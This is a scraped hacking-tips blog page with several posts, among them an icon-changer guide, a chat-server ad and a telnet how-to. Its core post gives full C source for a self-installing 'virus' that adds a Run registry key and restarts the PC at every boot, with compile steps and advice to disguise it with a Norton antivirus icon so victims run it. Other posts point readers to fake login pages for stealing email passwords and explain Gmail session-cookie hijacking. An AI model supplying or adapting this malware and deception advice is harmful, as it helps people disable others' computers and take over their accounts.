This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

How to Change the ICON of an EXE file ?


Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.


For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie:The tool changes the exe ICON permanantly.


I’ll give you a step-by-step instruction on how to use this tool to change the icon.


1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).


2. Right-click on the exe file whose ICON is to be changed.


3. Now you will see the option Change Icon…Click on that option.


4. Now the Icon Changer program will open up.


5. Icon changer will search for all the ICONS on your system so that you can select any one of those.


6. Now select the ICON of your choice and click on SET.


7. Now a popup window will appear and ask you to select from either of these two options.



  • Change embeded icon.

  • Adjust Windows to display custom icon.


Select the first option (Change embeded icon).


8. You are done.The ICON get’s changed.

Creating a Virus to restart the Computer at every Startup


Today I will show you how to create a virus that restarts the computer upon every startup.That is, upon infection, the computer will get restarted every time the system is booted.This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.


For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations.And one more thing,none of the antivirus softwares detect’s this as a virus.I have coded this virus in C.So if you are familiar with C language then it’s too easy to understand the logic behind the coding.


Here is the source code.


#include<stdio.h>

#include<dos.h>

#include<dir.h>


int found,drive_no;char buff[128];


void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}


void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

break;


case 2:

target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe”);

break;


case 3:

target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe”);

break;


case 4:

target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe”);

break;


default:

exit(0);

}


while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}


else

system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart

}


NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.


Compiling The Scource Code Into Executable Virus.



1. Download the source code here

2. The downloaded file will be Sysres.C

3. Compile it in any 32-Bit compiler (Borland C++ 5.5 or higher is recommended)

4. The resulting .exe file is a virus and once you execute it will infect the system.


Testing And Removing The Virus From Your PC



You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.


1. Reboot your computer in the SAFE MODE

2. Goto X:\Windows\System (X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to


HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run 


 


There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.


Logic Behind The Working Of The Virus



If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.


LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.


This process is repeated every time the PC is restarted.


NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.


AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)


After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.


For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.


The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

Chat without Yahoo Messenger or Gtalk ?

Can we chat without Yahoo messenger? Most of us are familiar with the most widely used applications such as Yahoo messenger and Gtalk to carry out chatting with our friends.But here I’ll show how to chat without Yahoo messenger or Gtalk.As we all know the information we exchange with their servers(Yahoo or Gtalk) are recorded and stored along with the corresponding IP addresses.This may hurt our privacy since all the information we exchange while chatting has to pass through a third party server.



Moreover if the matter is highly confidential, then it is necessary to have a totally private chat where the messages are exchanged only between the people involved in the chat and not with any other third party servers.At these situations, it is better to chat without Yahoo messenger.

So, how to carry out a private chat without Yahoo messenger or Gtalk?

For this purpose there exists many softwares that support’s you to host a web-based chat system without any additional software or services.So with these softwares the exchange of messages takes place directly between the two persons engaging in the chat and will not pass through any other third party server.This ensures 100% privacy and eliminates the desperate need to chat with Yahoo messenger.

One of my favorite program for private chat is Easy Chat Server




Easy Chat Server is a Windows program that allows you to host a web-based chat system without any additional software or services. Unlike other chat server, you do not need to install Java. It allows you to build one or more web-based chat rooms on your machine, and provides advanced chat functionalities aiming to offer discussion space for your users, customers and partners.

Here are some of the screenshots of Easy Chat Server.



 



 


Key Features of Easy Chat Server:


  • Easy to use, Simple installation that will have you up and running in minutes.

  • 128-Bit Security Socket Layer(SSL) support. support for server level certificate creation.

  • Instantly runs a complete chat server on your PCs - does not need to install any Web Server.

  • Supports full private messaging and One to One private chat.

  • Support of images, smileys, avatar icons.

  • Full chat and access logs are available within the chat server.

  • Have a built-in IP Filter, supports banning/unbanning IP address, securely.

  • Multiple styles available for the user to customize rooms.

  • Unlimited rooms and users, no any annual, per-user, or maintenance fees.

  • No spyware, adware or other unwanted extra programs.

Email Hacking Software

Email Hacking Software - Password Hacking Software - Yahoo Hacking Software - Hotmail Hacking Software

Don’t get fooled by these words. Most of us are very curious about software that can hack emails.In fact most of the searches about hacking contain the keyword email hacking software.Yes most of the people think that it is possible to hack into Yahoo, Gmail or Hotmail using a software.But is it really possible to hack an email? Nothing is impossible! But this doesn’t mean that it is possible using a software.


Now most of you might have got confused! These are some of the questions that may arise in your mind now.




1. Is there any software that can hack an email account?



THERE IS NO READYMADE SOFTWARE FOR HACKING AN EMAIL ACCOUNT.Yes this is true.If you come across any website selling a software with the label like “EMAIL HACKING SOFTWARE” then the site is totally a scam site.I bet, there exists no such program/software.You may search the entire web, but none of the software works.This may be disappointing most of you, but it is true.So, here onwards STOP searching for such software.Most of you may not beleive my words now.Read further and you’ll understand.


Think logically! If there exists such software then what about Google,Yahoo and Hotmail.We all know that they are the top giants which are providing the email service to millions of people.They have invested billions of $$ on these projects and is one of the main source of income for them.If that can be hacked using a software? Don’t even imagine this.These giants have thousands of Network Security Specialists who work 24/7 to combat exploits.Even if there exists any such vulnerability (Bug) they are patched in quick time before they are exploited by hackers.


Suppose assume that a hacker has developed a software and has somehow succeeded to hack into an account.He can use this software to hack the accounts of some big company/merchants and make billions of dollars overnight. With this being the case why should he sell this software on the internet for some cheap money? Inturn he can keep this software as a secret and continue with his work.Now think,does it make sense in selling this software for money? Absolutely NOT.


So the bottomline is never beleive the sites which claims to offer a software to hack an email.These sites are 100% scam.


They just want to trap some innocent people who beleive this.I can give you many examples where people are fooled by these kind of sites.I’ll not disclose the names of these sites for obvious reasons.But one thing I’ll tell you.If a site claims to sell an such software or asks you to pay before they send you the password then that site is really stupid and nonsense.Even if such software exists it will never be available for sale.So don’t get fooled by these sites.There exist’s no Software for email hacking.


 

2. Are there any real hackers who can hack the password?


There may be! Who know’s.But don’t think that hacking an email is so easy.It is almost impossible to hack Yahoo,Gmail or Hotmail.So even if there exists such a hacker the chances of you getting his contact is very rare.



3. There are many sites on the internet which claim to hack any password for money.Are they legitimate? Will they really hack password?


Most of the sites which claim to hack an email are not genuine.They just cheat innocent people to sniff money.There are many sites which claim to show some proofs such as screenshot of the inbox before you can make a payment.I have tried few such sites but none of them responded or showed me such proofs.But it’s not a loss to try such sites unless you don’t pay them until they show you the proofs.But never pay before they show the proofs.


4. Finally are there any other ways to hack an email password?


One good news for all of you.It is still possible to hack an email account and get the password.These are some of the working methods that you can try to hack an email password.It is disscussed in the post Hacking An Email Account and Hacking Yahoo, Gmail or any other Password which covers the real ways of professional hacking using Fake Login Pages.

Gmail Hacking Tool - A New Way to Hack Gmail


A new Gmail hacking tool that is capable of automatically stealing the Gmail IDs of non-encrypted sessions and breaking into Gmail accounts has been presented at the Defcon hackers’ conference in Las Vegas.


Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed this Gmail hacking tool is planning to release the tool in two weeks.


When you log in to Gmail account the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually click the sign out button. When you click sign out this cookie is cleared.Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done.


According to Google this behavior was chosen because of low-bandwidth users, as SLL connections requires high bandwidth.The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for a hacker to sniff the traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. The new Gmail hacking tool is capable of doing this.Once this happens the hacker can log into the account without the need of a password. People checking their e-mail from public wireless hotspots are more likely to get hacked than the ones using secure wired networks.


Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.


“If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.

How to Copy Locked Photos from Orkut ?


Recently Orkut updated it’s security feature and disabled Right-click on photos of friend’s album.So this makes it difficult to copy photos from Orkut.It’s a new security update made by Orkut to prevent people from copying photos from Orkut and misusing it.This may be annoying most of you! Then…


How To Copy Locked Photos From Orkut?



Yes it’s still possible to copy the photos from Orkut.Here’s a step-by-step procedure to copy the photo.


1. Login into your Orkut Account.


2. Goto your friend’s album and open the photo that you need to copy.


3. Once the photo is loaded to it’s full size just place the mouse cursor on the photo.


4. Press the left click button and drag and drop the photo onto the ADDRESS BAR.I think this trick is no longer working.So I have a new trick….


Just DRAG and DROP the PHOTO onto the current/new TAB (If you have IE 7). That’s it . This trick is working now!!



4. Now the photo gets displayed seperately on your browser.


5. You can Right-Click and select the Save As option to save the photo onto your PC.


The browser also displays the direct link to the photo.This link can be used to share the Orkut photos with your friends without the need to login to your Orkut account to access photos.


Please express your opinions through comments.Cheer Up..


Happy Orkut Hacking.

How to Enable Telnet Command in Vista ?


Most of you are familiar with the telnet command.It is one of the well known Windows IP Utilities .In fact the telnet command is most important for sending a fake email which i have discussed in my previous post.If you are using Windows XP the telnet command is available by default.But if you use Windows Vista the telnet command is disabled by default.


So when you try to use the telnet command in Windows Vista you get the following error message.


‘telnet’ is not recognized as an internal or external command,operable program or batch file.



You get this error in Vista because unlike XP ,Vista does not support telnet command by default.So, for this you have to manually enable/turn on the telnet feature in Vista.


Here’s the step by step procedure to enable telnet feature (telnet command) in Windows Vista.


1. Goto the Control Panel.


2. Click on the sub heading Uninstall a program under the main heading Programs.


NOTE: IF you are in the Classic View click on Programs and Features.


3. Now in the left panel under the Tasks select the option Turn Windows features on or off.



4. Now a new window opens.In the new window select the following


Telnet Client

Telnet Server (optional)


5. After selecting click on OK.


Now wait for few minutes till the telnet feature is installed.Once the telnet feature is installed you can goto the command prompt and use the telnet command.System restart is not required.